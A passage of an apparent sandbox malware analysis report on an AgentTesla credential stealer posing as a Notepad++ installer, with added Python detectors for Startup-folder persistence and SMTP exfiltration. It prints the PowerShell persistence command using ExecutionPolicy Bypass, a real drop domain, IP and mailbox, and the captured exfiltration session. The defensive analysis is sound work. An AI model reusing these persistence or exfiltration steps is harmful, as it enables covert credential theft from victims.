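# Second transcript (PID 6716): the copy already in Startup copies itself onto itself.
TRANSCRIPT_SECOND = "\r\n".join([
    "**********************",
    "Windows PowerShell transcript start",
    "Start time: 20210225122618",
    r"Username: computer\user",
    "Machine: 376483 (Microsoft Windows NT 10.0.17134.0)",
    r"Host Application: Powershell.exe -ExecutionPolicy Bypass -command Copy-Item "
    r"'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe' "
    r"'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe'",
    "Process ID: 6716",
    "**********************",
])


@dataclass
class Finding:
    start_time: str
    username: str
    pid: str
    host_application: str
    execution_policy_bypass: bool
    copy_src: str
    copy_dst: str
    dst_in_startup: bool
    self_copy: bool


def read_transcript(path: str) -> str:
    # Transcripts are UTF-8 with a BOM; utf-8-sig strips it so the first header line parses.
    with open(path, encoding="utf-8-sig") as fh:
        return fh.read()


def parse_transcript(text: str) -> Finding:
    header = {}
    for line in text.splitlines():
        key, sep, value = line.partition(": ")
        if sep and key not in header:        # keep the first header block only
            header[key] = value.strip()
    host = header.get("Host Application", "")
    m = COPY_ITEM_RE.search(host)
    src, dst = (m.group(1), m.group(2)) if m else ("", "")
    return Finding(
        start_time=header.get("Start time", ""),
        username=header.get("Username", ""),
        pid=header.get("Process ID", ""),
        host_application=host,
        execution_policy_bypass=BYPASS_RE.search(host) is not None,
        copy_src=src,
        copy_dst=dst,
        dst_in_startup=STARTUP_DIR_RE.search(dst) is not None,
        self_copy=bool(src) and src.lower() == dst.lower(),
    )


def persistence_reasons(f: Finding) -> list:
    """Why this transcript looks like Startup-folder persistence (empty = benign)."""
    reasons = []
    if f.execution_policy_bypass:
        reasons.append("execution policy bypassed on the command line")
    if f.dst_in_startup:
        reasons.append("Copy-Item destination is the per-user Startup folder: " + f.copy_dst)
    if f.self_copy and f.dst_in_startup:
        reasons.append("source equals destination: a binary already in Startup is re-asserting persistence")
    return reasons


def scan_transcripts(texts) -> list:
    """Return (pid, reasons) for every transcript with at least one indicator."""
    hits = []
    for text in texts:
        f = parse_transcript(text)
        r = persistence_reasons(f)
        if r:
            hits.append((f.pid, r))
    return hits
```

On a live host, feed `read_transcript()` the files under the transcript output directory (here `C:\Users\user\Documents\<date>\`) to `scan_transcripts()`; the PID in each hit ties back to the process tree in the Behavior section.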

                                      Static File Info

                                      General

                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Entropy (8bit):7.223416647299071
                                      TrID:
                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                      • Win32 Executable (generic) a (10002005/4) 49.78%
                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                      • DOS Executable Generic (2002/1) 0.01%
                                      File name:NKPhba0VZI.exe
                                      File size:620032
                                      MD5:3a89cf2d6d2449ef1a9640af29f3a782
                                      SHA1:220b9c5b4c7e9de15753f629da1ac3a075dc0800
                                      SHA256:3d652eb897291f8eb2fe8f9374007388b0cd426a797de77545b82a325dde762a
                                      SHA512:8b016c645c5cc5874f9fbd9539846cc74a07ba33db75e11d0fd80eeec8d0dcae081b7b4a4090b5f806a2ce38bd8eaca859e15962441c691fd42995ae7ff9f974
                                      SSDEEP:12288:fFQMGhfwkDj84te4xzFZF49OR7tQt4mcl:fFpGhfwO84teOV49OR7tQte
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....J7`..............0.................. ........@.. ....................................@................................

                                      File Icon

                                      Icon Hash:b464e4d0f0e8cc60

                                      Static PE Info

                                      General

                                      Entrypoint:0x46b29e
                                      Entrypoint Section:.text
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                      DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                      Time Stamp:0x60374AFD [Thu Feb 25 07:00:13 2021 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:v4.0.30319
                                      OS Version Major:4
                                      OS Version Minor:0
                                      File Version Major:4
                                      File Version Minor:0
                                      Subsystem Version Major:4
                                      Subsystem Version Minor:0
                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                      Entrypoint Preview

                                      Instruction
                                      jmp dword ptr [00402000h]    ; the only real instruction: an indirect jump through the single IAT slot at RVA 0x2000 (imagebase 0x400000 + 0x2000, see Data Directories), i.e. into mscoree.dll!_CorExeMain, the standard native entry stub of a .NET executable
                                      add byte ptr [eax], al       ; repeated 97 times in the original listing: the bytes after the stub are 00 00 padding, which the disassembler renders as this instruction

                                      Data Directories

                                      Name                                 | Virtual Address | Virtual Size | Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT         | 0x0             | 0x0          |
                                      IMAGE_DIRECTORY_ENTRY_IMPORT         | 0x6b24c         | 0x4f         | .text
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE       | 0x6c000         | 0x2dd2e      | .rsrc
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION      | 0x0             | 0x0          |
                                      IMAGE_DIRECTORY_ENTRY_SECURITY       | 0x0             | 0x0          |
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC      | 0x9a000         | 0xc          | .reloc
                                      IMAGE_DIRECTORY_ENTRY_DEBUG          | 0x0             | 0x0          |
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT      | 0x0             | 0x0          |
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR      | 0x0             | 0x0          |
                                      IMAGE_DIRECTORY_ENTRY_TLS            | 0x0             | 0x0          |
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG    | 0x0             | 0x0          |
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT   | 0x0             | 0x0          |
                                      IMAGE_DIRECTORY_ENTRY_IAT            | 0x2000          | 0x8          | .text
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT   | 0x0             | 0x0          |
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008          | 0x48         | .text
                                      IMAGE_DIRECTORY_ENTRY_RESERVED       | 0x0             | 0x0          |

                                      Sections

                                      Name   | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy        | Characteristics
                                      .text  | 0x2000          | 0x692a4      | 0x69400  | False    | 0.948065895932  | data      | 7.99096434579  | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                      .rsrc  | 0x6c000         | 0x2dd2e      | 0x2de00  | False    | 0.176180389986  | data      | 3.85673474952  | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .reloc | 0x9a000         | 0xc          | 0x200    | False    | 0.044921875     | data      | 0.101910425663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                      Resources

                                      Name          | RVA     | Size    | Type                                                                                                                                         | Language | Country
                                      RT_ICON       | 0x6c2e0 | 0x3f7b  | PNG image data, 512 x 512, 8-bit/color RGBA, non-interlaced                                                                                  |          |
                                      RT_ICON       | 0x7025c | 0x1cb0  | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced                                                                                  |          |
                                      RT_ICON       | 0x71f0c | 0x10828 | dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0                                 |          |
                                      RT_ICON       | 0x82734 | 0x94a8  | data                                                                                                                                         |          |
                                      RT_ICON       | 0x8bbdc | 0x5488  | data                                                                                                                                         |          |
                                      RT_ICON       | 0x91064 | 0x4228  | dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 4294967295, next used block 4294967295 |          |
                                      RT_ICON       | 0x9528c | 0x25a8  | data                                                                                                                                         |          |
                                      RT_ICON       | 0x97834 | 0x10a8  | data                                                                                                                                         |          |
                                      RT_ICON       | 0x988dc | 0x988   | data                                                                                                                                         |          |
                                      RT_ICON       | 0x99264 | 0x468   | GLS_BINARY_LSB_FIRST                                                                                                                         |          |
                                      RT_GROUP_ICON | 0x996cc | 0x92    | data                                                                                                                                         |          |
                                      RT_VERSION    | 0x99760 | 0x3e4   | data                                                                                                                                         |          |
                                      RT_MANIFEST   | 0x99b44 | 0x1ea   | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators                                                                  |          |

                                      Imports

                                      DLL         | Import
                                      mscoree.dll | _CorExeMain

                                      Version Infos

                                      Description      | Data
                                      Translation      | 0x0000 0x04b0
                                      LegalCopyright   | Copyleft 1998-2017 by Don HO
                                      Assembly Version | 7.88.0.0
                                      InternalName     | npp.7.8.8.Installer.x64.exe
                                      FileVersion      | 7.88.0.0
                                      CompanyName      | Don HO don.h@free.fr
                                      Comments         | Notepad++ : a free (GNU) source code editor
                                      ProductName      | Notepad++
                                      ProductVersion   | 7.88.0.0
                                      FileDescription  | npp.7.8.8.Installer.x64
                                      OriginalFilename | npp.7.8.8.Installer.x64.exe

                                      Network Behavior

                                      Snort IDS Alerts

                                      Timestamp                | Protocol | SID     | Message                             | Source Port | Dest Port | Source IP   | Dest IP
                                      02/25/21-12:27:13.705905 | TCP      | 2030171 | ET TROJAN AgentTesla Exfil Via SMTP | 49737       | 587       | 192.168.2.3 | 198.54.126.101

                                      Network Port Distribution

                                      TCP Packets

                                      Timestamp                           | Source Port | Dest Port | Source IP      | Dest IP
                                      Feb 25, 2021 12:27:12.107192993 CET | 49737       | 587       | 192.168.2.3    | 198.54.126.101
                                      Feb 25, 2021 12:27:12.301110983 CET | 587         | 49737     | 198.54.126.101 | 192.168.2.3
                                      Feb 25, 2021 12:27:12.301367998 CET | 49737       | 587       | 192.168.2.3    | 198.54.126.101
                                      Feb 25, 2021 12:27:12.523302078 CET | 587         | 49737     | 198.54.126.101 | 192.168.2.3
                                      Feb 25, 2021 12:27:12.523868084 CET | 49737       | 587       | 192.168.2.3    | 198.54.126.101
                                      Feb 25, 2021 12:27:12.717905045 CET | 587         | 49737     | 198.54.126.101 | 192.168.2.3
                                      Feb 25, 2021 12:27:12.719856024 CET | 49737       | 587       | 192.168.2.3    | 198.54.126.101
                                      Feb 25, 2021 12:27:12.914923906 CET | 587         | 49737     | 198.54.126.101 | 192.168.2.3
                                      Feb 25, 2021 12:27:12.916127920 CET | 49737       | 587       | 192.168.2.3    | 198.54.126.101
                                      Feb 25, 2021 12:27:13.116626024 CET | 587         | 49737     | 198.54.126.101 | 192.168.2.3
                                      Feb 25, 2021 12:27:13.117693901 CET | 49737       | 587       | 192.168.2.3    | 198.54.126.101
                                      Feb 25, 2021 12:27:13.311660051 CET | 587         | 49737     | 198.54.126.101 | 192.168.2.3
                                      Feb 25, 2021 12:27:13.312208891 CET | 49737       | 587       | 192.168.2.3    | 198.54.126.101
                                      Feb 25, 2021 12:27:13.508594036 CET | 587         | 49737     | 198.54.126.101 | 192.168.2.3
                                      Feb 25, 2021 12:27:13.509141922 CET | 49737       | 587       | 192.168.2.3    | 198.54.126.101
                                      Feb 25, 2021 12:27:13.703646898 CET | 587         | 49737     | 198.54.126.101 | 192.168.2.3
                                      Feb 25, 2021 12:27:13.703672886 CET | 587         | 49737     | 198.54.126.101 | 192.168.2.3
                                      Feb 25, 2021 12:27:13.705904961 CET | 49737       | 587       | 192.168.2.3    | 198.54.126.101
                                      Feb 25, 2021 12:27:13.706126928 CET | 49737       | 587       | 192.168.2.3    | 198.54.126.101
                                      Feb 25, 2021 12:27:13.706270933 CET | 49737       | 587       | 192.168.2.3    | 198.54.126.101
                                      Feb 25, 2021 12:27:13.706384897 CET | 49737       | 587       | 192.168.2.3    | 198.54.126.101
                                      Feb 25, 2021 12:27:13.899764061 CET | 587         | 49737     | 198.54.126.101 | 192.168.2.3
                                      Feb 25, 2021 12:27:13.899883032 CET | 587         | 49737     | 198.54.126.101 | 192.168.2.3
                                      Feb 25, 2021 12:27:13.904340982 CET | 587         | 49737     | 198.54.126.101 | 192.168.2.3
                                      Feb 25, 2021 12:27:13.946199894 CET | 49737       | 587       | 192.168.2.3    | 198.54.126.101
                                      Feb 25, 2021 12:27:33.201303005 CET | 49738       | 587       | 192.168.2.3    | 198.54.126.101
                                      Feb 25, 2021 12:27:33.395412922 CET | 587         | 49738     | 198.54.126.101 | 192.168.2.3
                                      Feb 25, 2021 12:27:33.395574093 CET | 49738       | 587       | 192.168.2.3    | 198.54.126.101

                                      UDP Packets

                                      Timestamp                           | Source Port | Dest Port | Source IP   | Dest IP
                                      Feb 25, 2021 12:25:08.369167089 CET | 49199       | 53        | 192.168.2.3 | 8.8.8.8
                                      Feb 25, 2021 12:25:08.417960882 CET | 53          | 49199     | 8.8.8.8     | 192.168.2.3
                                      Feb 25, 2021 12:25:08.659282923 CET | 50620       | 53        | 192.168.2.3 | 8.8.8.8
                                      Feb 25, 2021 12:25:08.722466946 CET | 53          | 50620     | 8.8.8.8     | 192.168.2.3
                                      Feb 25, 2021 12:25:09.307163954 CET | 64938       | 53        | 192.168.2.3 | 8.8.8.8
                                      Feb 25, 2021 12:25:09.357064962 CET | 53          | 64938     | 8.8.8.8     | 192.168.2.3
                                      Feb 25, 2021 12:25:10.482485056 CET | 60152       | 53        | 192.168.2.3 | 8.8.8.8
                                      Feb 25, 2021 12:25:10.534046888 CET | 53          | 60152     | 8.8.8.8     | 192.168.2.3
                                      Feb 25, 2021 12:25:11.706245899 CET | 57544       | 53        | 192.168.2.3 | 8.8.8.8
                                      Feb 25, 2021 12:25:11.755585909 CET | 53          | 57544     | 8.8.8.8     | 192.168.2.3
                                      Feb 25, 2021 12:25:12.776644945 CET | 55984       | 53        | 192.168.2.3 | 8.8.8.8
                                      Feb 25, 2021 12:25:12.826366901 CET | 53          | 55984     | 8.8.8.8     | 192.168.2.3
                                      Feb 25, 2021 12:25:14.049705982 CET | 64185       | 53        | 192.168.2.3 | 8.8.8.8
                                      Feb 25, 2021 12:25:14.098529100 CET | 53          | 64185     | 8.8.8.8     | 192.168.2.3
                                      Feb 25, 2021 12:25:15.441617966 CET | 65110       | 53        | 192.168.2.3 | 8.8.8.8
                                      Feb 25, 2021 12:25:15.493315935 CET | 53          | 65110     | 8.8.8.8     | 192.168.2.3
                                      Feb 25, 2021 12:25:17.102761984 CET | 58361       | 53        | 192.168.2.3 | 8.8.8.8
                                      Feb 25, 2021 12:25:17.153072119 CET | 53          | 58361     | 8.8.8.8     | 192.168.2.3
                                      Feb 25, 2021 12:25:18.089878082 CET | 63492       | 53        | 192.168.2.3 | 8.8.8.8
                                      Feb 25, 2021 12:25:18.138489008 CET | 53          | 63492     | 8.8.8.8     | 192.168.2.3
                                      Feb 25, 2021 12:25:19.213738918 CET | 60831       | 53        | 192.168.2.3 | 8.8.8.8
                                      Feb 25, 2021 12:25:19.265455008 CET | 53          | 60831     | 8.8.8.8     | 192.168.2.3
                                      Feb 25, 2021 12:25:20.372988939 CET | 60100       | 53        | 192.168.2.3 | 8.8.8.8
                                      Feb 25, 2021 12:25:20.422996044 CET | 53          | 60100     | 8.8.8.8     | 192.168.2.3
                                      Feb 25, 2021 12:25:21.361355066 CET | 53195       | 53        | 192.168.2.3 | 8.8.8.8
                                      Feb 25, 2021 12:25:21.412098885 CET | 53          | 53195     | 8.8.8.8     | 192.168.2.3
                                      Feb 25, 2021 12:25:22.318399906 CET | 50141       | 53        | 192.168.2.3 | 8.8.8.8
                                      Feb 25, 2021 12:25:22.369878054 CET | 53          | 50141     | 8.8.8.8     | 192.168.2.3
                                      Feb 25, 2021 12:25:23.270442963 CET | 53023       | 53        | 192.168.2.3 | 8.8.8.8
                                      Feb 25, 2021 12:25:23.319164038 CET | 53          | 53023     | 8.8.8.8     | 192.168.2.3
                                      Feb 25, 2021 12:25:27.636946917 CET | 49563       | 53        | 192.168.2.3 | 8.8.8.8
                                      Feb 25, 2021 12:25:27.696160078 CET | 53          | 49563     | 8.8.8.8     | 192.168.2.3
                                      Feb 25, 2021 12:25:28.644984007 CET | 51352       | 53        | 192.168.2.3 | 8.8.8.8
                                      Feb 25, 2021 12:25:28.696481943 CET | 53          | 51352     | 8.8.8.8     | 192.168.2.3
                                      Feb 25, 2021 12:25:29.979038000 CET | 59349       | 53        | 192.168.2.3 | 8.8.8.8
                                      Feb 25, 2021 12:25:30.030638933 CET | 53          | 59349     | 8.8.8.8     | 192.168.2.3
                                      Feb 25, 2021 12:25:40.830547094 CET | 58722       | 53        | 192.168.2.3 | 8.8.8.8
                                      Feb 25, 2021 12:25:40.839669943 CET | 56596       | 53        | 192.168.2.3 | 8.8.8.8
                                      Feb 25, 2021 12:25:40.865278959 CET | 64101       | 53        | 192.168.2.3 | 8.8.8.8
                                      Feb 25, 2021 12:25:40.879713058 CET | 53          | 58722     | 8.8.8.8     | 192.168.2.3
                                      Feb 25, 2021 12:25:40.888416052 CET | 53          | 56596     | 8.8.8.8     | 192.168.2.3
                                      Feb 25, 2021 12:25:40.914099932 CET | 53          | 64101     | 8.8.8.8     | 192.168.2.3
                                      Feb 25, 2021 12:25:46.671922922 CET | 57084       | 53        | 192.168.2.3 | 8.8.8.8
                                      Feb 25, 2021 12:25:46.742041111 CET | 53          | 57084     | 8.8.8.8     | 192.168.2.3
                                      Feb 25, 2021 12:25:48.235739946 CET | 58823       | 53        | 192.168.2.3 | 8.8.8.8
                                      Feb 25, 2021 12:25:48.284493923 CET | 53          | 58823     | 8.8.8.8     | 192.168.2.3
                                      Feb 25, 2021 12:26:02.729145050 CET | 57568       | 53        | 192.168.2.3 | 8.8.8.8
                                      Feb 25, 2021 12:26:02.778305054 CET | 53          | 57568     | 8.8.8.8     | 192.168.2.3
                                      Feb 25, 2021 12:26:30.592060089 CET | 50540       | 53        | 192.168.2.3 | 8.8.8.8
                                      Feb 25, 2021 12:26:30.666124105 CET | 53          | 50540     | 8.8.8.8     | 192.168.2.3
                                      Feb 25, 2021 12:26:34.720683098 CET | 54366       | 53        | 192.168.2.3 | 8.8.8.8
                                      Feb 25, 2021 12:26:34.792062998 CET | 53          | 54366     | 8.8.8.8     | 192.168.2.3
                                      Feb 25, 2021 12:27:06.607259989 CET | 53034       | 53        | 192.168.2.3 | 8.8.8.8
                                      Feb 25, 2021 12:27:06.657413960 CET | 53          | 53034     | 8.8.8.8     | 192.168.2.3
                                      Feb 25, 2021 12:27:08.798253059 CET | 57762       | 53        | 192.168.2.3 | 8.8.8.8
                                      Feb 25, 2021 12:27:08.855751038 CET | 53          | 57762     | 8.8.8.8     | 192.168.2.3
                                      Feb 25, 2021 12:27:11.833801031 CET | 55435       | 53        | 192.168.2.3 | 8.8.8.8
                                      Feb 25, 2021 12:27:11.894119024 CET | 53          | 55435     | 8.8.8.8     | 192.168.2.3
                                      Feb 25, 2021 12:27:33.132627964 CET | 50713       | 53        | 192.168.2.3 | 8.8.8.8
                                      Feb 25, 2021 12:27:33.194283009 CET | 53          | 50713     | 8.8.8.8     | 192.168.2.3

                                      DNS Queries

                                      Timestamp                           | Source IP   | Dest IP | Trans ID | OP Code            | Name         | Type           | Class
                                      Feb 25, 2021 12:27:11.833801031 CET | 192.168.2.3 | 8.8.8.8 | 0xb094   | Standard query (0) | nobettwo.xyz | A (IP address) | IN (0x0001)
                                      Feb 25, 2021 12:27:33.132627964 CET | 192.168.2.3 | 8.8.8.8 | 0x2b26   | Standard query (0) | nobettwo.xyz | A (IP address) | IN (0x0001)

                                      DNS Answers

                                      Timestamp                           | Source IP | Dest IP     | Trans ID | Reply Code   | Name         | CName | Address        | Type           | Class
                                      Feb 25, 2021 12:27:11.894119024 CET | 8.8.8.8   | 192.168.2.3 | 0xb094   | No error (0) | nobettwo.xyz |       | 198.54.126.101 | A (IP address) | IN (0x0001)
                                      Feb 25, 2021 12:27:33.194283009 CET | 8.8.8.8   | 192.168.2.3 | 0x2b26   | No error (0) | nobettwo.xyz |       | 198.54.126.101 | A (IP address) | IN (0x0001)

                                      SMTP Packets

                                      Timestamp                           | Source Port | Dest Port | Source IP      | Dest IP        | Commands
                                      Feb 25, 2021 12:27:12.523302078 CET | 587         | 49737     | 198.54.126.101 | 192.168.2.3    | 220-server51.web-hosting.com ESMTP Exim 4.93 #2 Thu, 25 Feb 2021 06:27:12 -0500
                                                                          |             |           |                |                | 220-We do not authorize the use of this system to transport unsolicited,
                                                                          |             |           |                |                | 220 and/or bulk e-mail.
                                      Feb 25, 2021 12:27:12.523868084 CET | 49737       | 587       | 192.168.2.3    | 198.54.126.101 | EHLO 376483
                                      Feb 25, 2021 12:27:12.717905045 CET | 587         | 49737     | 198.54.126.101 | 192.168.2.3    | 250-server51.web-hosting.com Hello 376483 [84.17.52.78]
                                                                          |             |           |                |                | 250-SIZE 52428800
                                                                          |             |           |                |                | 250-8BITMIME
                                                                          |             |           |                |                | 250-PIPELINING
                                                                          |             |           |                |                | 250-AUTH PLAIN LOGIN
                                                                          |             |           |                |                | 250-STARTTLS
                                                                          |             |           |                |                | 250 HELP
                                      Feb 25, 2021 12:27:12.719856024 CET | 49737       | 587       | 192.168.2.3    | 198.54.126.101 | AUTH login dGgzYm9va3NAbm9iZXR0d28ueHl6
                                      Feb 25, 2021 12:27:12.914923906 CET | 587         | 49737     | 198.54.126.101 | 192.168.2.3    | 334 UGFzc3dvcmQ6
                                      Feb 25, 2021 12:27:13.116626024 CET | 587         | 49737     | 198.54.126.101 | 192.168.2.3    | 235 Authentication succeeded
                                      Feb 25, 2021 12:27:13.117693901 CET | 49737       | 587       | 192.168.2.3    | 198.54.126.101 | MAIL FROM:<th3books@nobettwo.xyz>
                                      Feb 25, 2021 12:27:13.311660051 CET | 587         | 49737     | 198.54.126.101 | 192.168.2.3    | 250 OK
                                      Feb 25, 2021 12:27:13.312208891 CET | 49737       | 587       | 192.168.2.3    | 198.54.126.101 | RCPT TO:<th3books@nobettwo.xyz>
                                      Feb 25, 2021 12:27:13.508594036 CET | 587         | 49737     | 198.54.126.101 | 192.168.2.3    | 250 Accepted
                                      Feb 25, 2021 12:27:13.509141922 CET | 49737       | 587       | 192.168.2.3    | 198.54.126.101 | DATA
                                      Feb 25, 2021 12:27:13.703672886 CET | 587         | 49737     | 198.54.126.101 | 192.168.2.3    | 354 Enter message, ending with "." on a line by itself
                                      Feb 25, 2021 12:27:13.706384897 CET | 49737       | 587       | 192.168.2.3    | 198.54.126.101 | .
                                      Feb 25, 2021 12:27:13.904340982 CET | 587         | 49737     | 198.54.126.101 | 192.168.2.3    | 250 OK id=1lFEnZ-003wuX-KE

                                      The AUTH LOGIN token dGgzYm9va3NAbm9iZXR0d28ueHl6 is base64 for th3books@nobettwo.xyz and the 334 challenge UGFzc3dvcmQ6 is base64 for "Password:"; the server offered STARTTLS but the client authenticated and sent the message in cleartext on port 587, which is why the ET TROJAN AgentTesla Exfil Via SMTP rule fired on this session.
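
The exchange above is the whole exfiltration channel: a cleartext AUTH LOGIN to a mailbox the operator controls, followed by a message sent from that mailbox to itself. As an added example (not Joe Sandbox or AgentTesla code, and not part of the report), the script below parses a client/server SMTP dialogue of this form, decodes the SASL token to recover the login name, and lists the reasons the session matches the stealer-exfil pattern. The sample dialogue is reconstructed from the table above; the client's password reply to the 334 challenge is not shown in the report and is therefore not included. The SmtpSession fields and the indicator heuristics are the example's own.

```python
"""Pull exfiltration indicators out of a captured SMTP dialogue.
Added example, not Joe Sandbox or AgentTesla code. SAMPLE_DIALOGUE is reconstructed
from this report's SMTP Packets table ("C:" = client 192.168.2.3:49737, "S:" = server
198.54.126.101:587); the client's password reply to "334 UGFzc3dvcmQ6" is left out."""
import base64
import re
from dataclasses import dataclass, field

SAMPLE_DIALOGUE = """\
S: 220-server51.web-hosting.com ESMTP Exim 4.93 #2 Thu, 25 Feb 2021 06:27:12 -0500
S: 220-We do not authorize the use of this system to transport unsolicited,
S: 220 and/or bulk e-mail.
C: EHLO 376483
S: 250-server51.web-hosting.com Hello 376483 [84.17.52.78]
S: 250-SIZE 52428800
S: 250-8BITMIME
S: 250-PIPELINING
S: 250-AUTH PLAIN LOGIN
S: 250-STARTTLS
S: 250 HELP
C: AUTH login dGgzYm9va3NAbm9iZXR0d28ueHl6
S: 334 UGFzc3dvcmQ6
S: 235 Authentication succeeded
C: MAIL FROM:<th3books@nobettwo.xyz>
S: 250 OK
C: RCPT TO:<th3books@nobettwo.xyz>
S: 250 Accepted
C: DATA
S: 354 Enter message, ending with "." on a line by itself
C: .
S: 250 OK id=1lFEnZ-003wuX-KE
"""

@dataclass
class SmtpSession:
    ehlo_name: str = ""
    starttls_offered: bool = False
    starttls_used: bool = False
    auth_mechanism: str = ""
    auth_username: str = ""
    auth_succeeded: bool = False
    mail_from: str = ""
    rcpt_to: list = field(default_factory=list)
    queued_ids: list = field(default_factory=list)   # server-side queue ids, useful for abuse reports

def b64_text(token: str) -> str:
    """Decode a base64 SASL token, tolerating stripped '=' padding."""
    return base64.b64decode(token + "=" * (-len(token) % 4)).decode("utf-8", "replace")

def _addr(rest: str) -> str:
    m = re.search(r"<([^>]*)>", rest)                # MAIL FROM:<a@b> / RCPT TO:<a@b>
    return m.group(1) if m else rest.strip()

def parse_smtp_dialogue(text: str) -> SmtpSession:
    s = SmtpSession()
    for raw in text.splitlines():
        if raw[:2] not in ("C:", "S:"):
            continue
        side, line = raw[0], raw[3:].strip()
        if side == "S":
            if line[:4] in ("250-", "250 ") and line[4:].upper() == "STARTTLS":
                s.starttls_offered = True
            elif line.startswith("235"):
                s.auth_succeeded = True
            elif line.startswith("250 OK id="):
                s.queued_ids.append(line.split("id=", 1)[1])
            continue
        verb, _, rest = line.partition(" ")
        verb = verb.upper()
        if verb in ("EHLO", "HELO"):
            s.ehlo_name = rest
        elif verb == "STARTTLS":
            s.starttls_used = True
        elif verb == "AUTH":
            mech, _, initial = rest.partition(" ")
            s.auth_mechanism = mech.upper()
            if s.auth_mechanism == "LOGIN" and initial:   # username sent inline with AUTH LOGIN
                s.auth_username = b64_text(initial)
            elif s.auth_mechanism == "PLAIN" and initial:  # \0authzid\0authcid\0password
                parts = b64_text(initial).split("\x00")
                s.auth_username = parts[1] if len(parts) > 1 else ""
        elif verb == "MAIL":
            s.mail_from = _addr(rest)
        elif verb == "RCPT":
            s.rcpt_to.append(_addr(rest))
    return s

def exfil_indicators(s: SmtpSession) -> list:
    """Reasons this session matches the stealer-exfil pattern (empty list = none)."""
    reasons = []
    if s.auth_mechanism in ("LOGIN", "PLAIN") and not s.starttls_used:
        how = "offered but unused" if s.starttls_offered else "not offered"
        reasons.append(f"cleartext {s.auth_mechanism} auth (STARTTLS {how})")
    if s.mail_from and s.rcpt_to == [s.mail_from]:
        reasons.append(f"sender mails itself: {s.mail_from}")
    if s.auth_username and s.auth_username.lower() == s.mail_from.lower():
        reasons.append("SMTP login equals the sending address (dedicated drop mailbox)")
    if re.fullmatch(r"\d+", s.ehlo_name):
        reasons.append(f"EHLO name is a bare number, not a hostname: {s.ehlo_name}")
    return reasons
```

To run this against a real capture, export the TCP stream from the pcap as text and prefix each line with "C: " or "S: " by direction; the decoded login name and the queue id are the two values worth pivoting on when reporting the mailbox to the hosting provider.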

                                      Code Manipulations

                                      Statistics

                                      Behavior


                                      System Behavior

                                      General

                                      Start time:12:25:15
                                      Start date:25/02/2021
                                      Path:C:\Users\user\Desktop\NKPhba0VZI.exe
                                      Wow64 process (32bit):true
                                      Commandline:'C:\Users\user\Desktop\NKPhba0VZI.exe'
                                      Imagebase:0xcd0000
                                      File size:620032 bytes
                                      MD5 hash:3A89CF2D6D2449EF1A9640AF29F3A782
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:.Net C# or VB.NET
                                      Yara matches:
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000003.199780118.0000000001408000.00000004.00000001.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_BedsObfuscator, Description: Yara detected Beds Obfuscator, Source: 00000001.00000002.213095995.00000000056B0000.00000004.00000001.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.209833769.0000000004059000.00000004.00000001.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_BedsObfuscator, Description: Yara detected Beds Obfuscator, Source: 00000001.00000002.209833769.0000000004059000.00000004.00000001.sdmp, Author: Joe Security
                                      Reputation:low

                                      General

                                      Start time:12:25:17
                                      Start date:25/02/2021
                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):true
                                      Commandline:'Powershell.exe' -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\NKPhba0VZI.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe'
                                      Imagebase:0xe50000
                                      File size:430592 bytes
                                      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:.Net C# or VB.NET
                                      Reputation:high

                                      General

                                      Start time:12:25:17
                                      Start date:25/02/2021
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6b2800000
                                      File size:625664 bytes
                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high

                                      General

                                      Start time:12:25:19
                                      Start date:25/02/2021
